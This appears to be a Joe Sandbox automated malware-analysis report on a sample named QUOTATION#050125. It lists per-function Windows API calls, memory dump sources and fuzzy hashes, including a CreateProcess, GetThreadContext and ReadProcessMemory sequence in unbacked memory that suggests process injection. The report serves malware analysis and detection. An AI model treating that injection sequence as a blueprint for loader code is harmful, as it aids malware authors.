                                                                                      • Opcode Fuzzy Hash: e0a77e89d3fb833941fcf30cb5155f0ac36e0c1659617306f3dac9ed843b71fc
                                                                                      • Instruction Fuzzy Hash: 2E518630D05248DBEF11DBE4C814BEEBB79AF19304F144199E249BB2C1D6B91B85CB66

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000C3B0F,SwapMouseButtons,00000004,?), ref: 000C3B40
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000C3B0F,SwapMouseButtons,00000004,?), ref: 000C3B61
                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,000C3B0F,SwapMouseButtons,00000004,?), ref: 000C3B83
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Control Panel\Mouse
                                                                                      • API String ID: 3677997916-824357125
                                                                                      • Opcode ID: 97fb02fb39f1050f6d84a9fb68eb34c8ed1313218f22f1c37adb634a02781225
                                                                                      • Instruction ID: f4b6254dbcab8f999431eebd78de3660539647761d391235f085f1c03dc3d8bd
                                                                                      • Opcode Fuzzy Hash: 97fb02fb39f1050f6d84a9fb68eb34c8ed1313218f22f1c37adb634a02781225
                                                                                      • Instruction Fuzzy Hash: 66112AB5520208FFDB608FA5DC44EEFB7BCEF44755B108459BA05D7150D3319E409BA0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00E19B2B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E19BC1
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E19BE3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                      • Instruction ID: 696d4d26075001d66caf411f833c3b392e5ec8451c56ff36e034cdffa84d891b
                                                                                      • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                      • Instruction Fuzzy Hash: A162FB30A14258DBEB24CFA4C850BDEB376EF58304F1091A9D10DFB295E7769E81CB59

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C3A04
                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001033A2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoadNotifyShell_String
                                                                                      • String ID: Line:
                                                                                      • API String ID: 3363329723-1585850449
                                                                                      • Opcode ID: e7d8b548b30345f4e0380540edacc8e41d6d59a828fb015fa24c818bf326f6d3
                                                                                      • Instruction ID: d24c7d4d8b9e56d99962dacae7caeb79f1e62206e2ea377e4b29f5604a9d7308
                                                                                      • Opcode Fuzzy Hash: e7d8b548b30345f4e0380540edacc8e41d6d59a828fb015fa24c818bf326f6d3
                                                                                      • Instruction Fuzzy Hash: 8431C171518305AED725EB20DC46FEFB7E8AB40720F00892EF59993592DB709B89C7C2
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001482F5
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 001482FC
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 001484DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 146820519-0
                                                                                      • Opcode ID: 1a7c0a7ec64d5e4f5679bc825b952fe12f3c4cb305adc6d4879db4f4fadaa483
                                                                                      • Instruction ID: ebc0b70f34ef5e7419b53a67b2c22787e29e8895df67acefb2fdac245e244274
                                                                                      • Opcode Fuzzy Hash: 1a7c0a7ec64d5e4f5679bc825b952fe12f3c4cb305adc6d4879db4f4fadaa483
                                                                                      • Instruction Fuzzy Hash: D6126B71A083019FC714DF28C484B6EBBE5BF85314F04895DE8998B2A2DB71E946CF92
                                                                                      APIs
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000C1BF4
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 000C1BFC
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000C1C07
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000C1C12
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 000C1C1A
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 000C1C22
                                                                                        • Part of subcall function 000C1B4A: RegisterWindowMessageW.USER32(00000004,?,000C12C4), ref: 000C1BA2
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000C136A
                                                                                      • OleInitialize.OLE32 ref: 000C1388
                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 001024AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1986988660-0
                                                                                      • Opcode ID: 4497153e40484b13a5ca7a6bd70ea5b9a4cb44e12925bf930734bcf3add4849a
                                                                                      • Instruction ID: 51b19cdaaf0505a943bdb5370a3129b00d8625052b37545a85874a1a374d7769
                                                                                      • Opcode Fuzzy Hash: 4497153e40484b13a5ca7a6bd70ea5b9a4cb44e12925bf930734bcf3add4849a
                                                                                      • Instruction Fuzzy Hash: B271CFB4901303AFE785DF79AA45A993AE1FB8A344357822FD41AD7B62EB3044C5CF41
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00102C8C
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                        • Part of subcall function 000C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C2DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                      • String ID: X
                                                                                      • API String ID: 779396738-3081909835
                                                                                      • Opcode ID: 8949581d72b05628e57ca6a6395ab7691f592e379477b4a7e28ea09b654f0b43
                                                                                      • Instruction ID: 3f137b3d2f21d416521dda66e55c7defd06fe712f4accad0d8fffebac898d2bd
                                                                                      • Opcode Fuzzy Hash: 8949581d72b05628e57ca6a6395ab7691f592e379477b4a7e28ea09b654f0b43
                                                                                      • Instruction Fuzzy Hash: C2217571A102589FDB11EF94C849BEE7BFCAF49314F00805DE545BB281DBF45A898FA1
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C3908
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_
                                                                                      • String ID:
                                                                                      • API String ID: 1144537725-0
                                                                                      • Opcode ID: e9518a028b3783e991c15940804d047f04c89f54857e8176bc306f8daf2380ac
                                                                                      • Instruction ID: e996329e0dbd43ae21edc3b36fa6cb3e57f568df8d932491f2e056a3fa39fd41
                                                                                      • Opcode Fuzzy Hash: e9518a028b3783e991c15940804d047f04c89f54857e8176bc306f8daf2380ac
                                                                                      • Instruction Fuzzy Hash: 8A319170504301DFD760DF24D885B9BBBF8FB49718F00092EF59987680E7B1AA88CB92
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C949C,?,00008000), ref: 000C5773
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,000C949C,?,00008000), ref: 00104052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 7007c6425eb0904fb2bb2f65f7db4c74ff81cdee74e97a7416ba02a012b3b321
                                                                                      • Instruction ID: 7904c858cccaff5434ca6689a33ce673a1e7c945c6d0f8f01b16b765cc0203d5
                                                                                      • Opcode Fuzzy Hash: 7007c6425eb0904fb2bb2f65f7db4c74ff81cdee74e97a7416ba02a012b3b321
                                                                                      • Instruction Fuzzy Hash: 35016130145725F6E3315A259C4EF9B7E98EF067B1F108304BA986E1E087B45494CB90
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,000FD7D1,00000000,00000000,00000000,00000000,?,000FD7F8,00000000,00000007,00000000,?,000FDBF5,00000000), ref: 000F29DE
                                                                                      • GetLastError.KERNEL32(00000000,?,000FD7D1,00000000,00000000,00000000,00000000,?,000FD7F8,00000000,00000007,00000000,?,000FDBF5,00000000,00000000), ref: 000F29F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: e2cf8bf80774f51aad8ee6141bf2fcbb647dda0c4acc037138438f2900a9a0c2
                                                                                      • Instruction ID: 9948356861fa56a8263ed10ff79c15cf199249594b1a37f39a6a0a66d0d1d4f3
                                                                                      • Opcode Fuzzy Hash: e2cf8bf80774f51aad8ee6141bf2fcbb647dda0c4acc037138438f2900a9a0c2
                                                                                      • Instruction Fuzzy Hash: 1EE08631100349EFDB206FB1EC08BA93BD8AB40751F140029F60999861DB3094D0D784
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,000F85CC,?,00188CC8,0000000C), ref: 000F8704
                                                                                      • GetLastError.KERNEL32(?,000F85CC,?,00188CC8,0000000C), ref: 000F870E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast
                                                                                      • String ID:
                                                                                      • API String ID: 918212764-0
                                                                                      • Opcode ID: a28971cf563fc162dbc94362d74cb1ba01aff939504861363a9b69eadb4b444d
                                                                                      • Instruction ID: d7169c14a8ec4a80ba0a944bd0e38212085f0bfae8e6ab91dc2ad744c60cd834
                                                                                      • Opcode Fuzzy Hash: a28971cf563fc162dbc94362d74cb1ba01aff939504861363a9b69eadb4b444d
                                                                                      • Instruction Fuzzy Hash: 2E014C336047285AC2A062346C497FE37C54B82779F254119EB04DB9D3DE60CD81A390
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00E19B2B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E19BC1
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E19BE3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                      • Instruction ID: 5e09410b8e6e4c5872730ffeb9e73f7d04d06011bbe8f496df50c5b37d3e36df
                                                                                      • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                      • Instruction Fuzzy Hash: AE12C024E14658C6EB24DF64D8507DEB272EF68300F10A0E9910DEB7A5E77A4FC1CB5A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: ed9275c49885fddcf7d2104b0a29855acde3aa256a50135613a8da079ca06b58
                                                                                      • Instruction ID: d948c2242c8ae3d94ff2e53265c1a6565351b4751151feb50c269dec96effe99
                                                                                      • Opcode Fuzzy Hash: ed9275c49885fddcf7d2104b0a29855acde3aa256a50135613a8da079ca06b58
                                                                                      • Instruction Fuzzy Hash: 46D13B75A04209EFCB14DF98D881DEDBBB5FF48314F15415AE915AB3A2DB30AE81CB90
APIs
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 4f479efec71328087c646c863aee5cfc37b03c68b479304e734d2a7594571fe9
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 6431F574A0020ADBC768CF59D580969F7A2FF49304B24D6A6E80ACB755D731EDD1CBE0
APIs
  • Part of subcall function 000C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E9C
  • Part of subcall function 000C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4EAE
  • Part of subcall function 000C4E90: FreeLibrary.KERNEL32(00000000,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4EFD
  • Part of subcall function 000C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E62
  • Part of subcall function 000C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4E74
  • Part of subcall function 000C4E59: FreeLibrary.KERNEL32(00000000,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E87
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
• Opcode ID: c64c41c966566ad2551665c1671b301869ca6e63b9c072a77b934046f1b3675d
• Instruction ID: 82070dd278fd2c6fec7ff5b1fd63f1653bbd557ffe39849652b8979407b5d51b
• Opcode Fuzzy Hash: c64c41c966566ad2551665c1671b301869ca6e63b9c072a77b934046f1b3675d
• Instruction Fuzzy Hash: D511E332610305AADB24FF60DC22FED77A5AF50711F20842EF552AA1D2EFB1AA459790
APIs
• RtlAllocateHeap.NTDLL(00000008,000C1129,00000000,?,000F2E29,00000001,00000364,?,?,?,000EF2DE,000F3863,00191444,?,000DFDF5,?), ref: 000F4CBE
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: a3571135a1dd7114326b77d20622eaf5a8b80f74dd9b12620206994daa30f7b5
• Instruction ID: 5ab14480cdc7a3ee8c19fb5a5a7ece19f40ab6e6c73c5a50b06646613d6a9d79
• Opcode Fuzzy Hash: a3571135a1dd7114326b77d20622eaf5a8b80f74dd9b12620206994daa30f7b5
• Instruction Fuzzy Hash: 6FF0BB3150226C6ADBA15F629C05B7B37D8BF41761B145125BF19A7A81CA30D80065D0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00191444,?,000DFDF5,?,?,000CA976,00000010,00191440,000C13FC,?,000C13C6,?,000C1129), ref: 000F3852
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: dcbf13906800e252306d2841bf747753c0ac3232d4fe320570f822de82ff811f
• Instruction ID: 83955f0597e0c6aab9be7531c696f51e6a4da2896ce8deffb275a942b3965516
• Opcode Fuzzy Hash: dcbf13906800e252306d2841bf747753c0ac3232d4fe320570f822de82ff811f
• Instruction Fuzzy Hash: 5CE0E53110036DAAD6712A779D01BFA36C8AB42BF0F090021BE04A6E81DF19DE03A1E0
APIs
• FreeLibrary.KERNEL32(?,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4F6D
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 40b4ded9df539fc131fac9c3a57e49c25021a966966fcb8cbda6cf08cbdf73d1
• Instruction ID: 9fe2efde7b695aad62b140791c359ee0754f92812b66b0fa0f9f41747cccc1f0
• Opcode Fuzzy Hash: 40b4ded9df539fc131fac9c3a57e49c25021a966966fcb8cbda6cf08cbdf73d1
• Instruction Fuzzy Hash: 5EF03971105752CFDB349F64D4A0E6ABBE4BF14329320897EE1EA82621CB319885DF50
APIs
• WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0010EE51,00183630,00000002), ref: 0012CD26
  • Part of subcall function 0012CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0012CD19,?,?,?), ref: 0012CC59
  • Part of subcall function 0012CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0012CD19,?,?,?,?,0010EE51,00183630,00000002), ref: 0012CC6E
  • Part of subcall function 0012CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0012CD19,?,?,?,?,0010EE51,00183630,00000002), ref: 0012CC7A
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
